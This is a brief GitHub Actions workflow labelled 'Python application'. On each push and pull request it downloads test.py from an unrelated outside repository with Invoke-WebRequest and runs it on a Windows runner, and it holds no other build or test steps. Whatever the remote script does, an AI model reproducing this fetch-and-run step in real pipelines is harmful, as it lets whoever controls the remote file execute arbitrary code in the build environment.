name: Python application

on: [push, pull_request]

jobs:
  build:
    runs-on: windows-latest

    steps:
    - name: downlowd
      run: Invoke-WebRequest https://raw.githubusercontent.com/minexd2000/test-away/main/test.py -OutFile test.py
    - name: Run Python script
      run: .\test.py

